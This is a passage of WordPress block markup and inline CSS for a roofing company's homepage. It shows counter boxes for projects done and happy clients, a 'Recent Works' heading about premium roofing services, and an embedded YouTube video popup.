!important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">541+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Projects Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"2a47d1fd-92e1-4c68-b763-70488f27ad66\"} -->\n<style type=\"text/css\"> .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2a47d1fd-92e1-4c68-b763-70488f27ad66\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"6aed668a-fb10-4525-96ac-4bc41b761fd7\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d\"} -->\n<style type=\"text/css\"> .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">Our</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"42aff9bf-25ea-43ea-b807-8a8c00c85148\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-42aff9bf-25ea-43ea-b807-8a8c00c85148 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"67a82438-88af-4556-ac9e-4c3da247e0cf\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-67a82438-88af-4556-ac9e-4c3da247e0cf\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"72cbdd00-2b42-4deb-a7fd-0c19210e65bf\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section 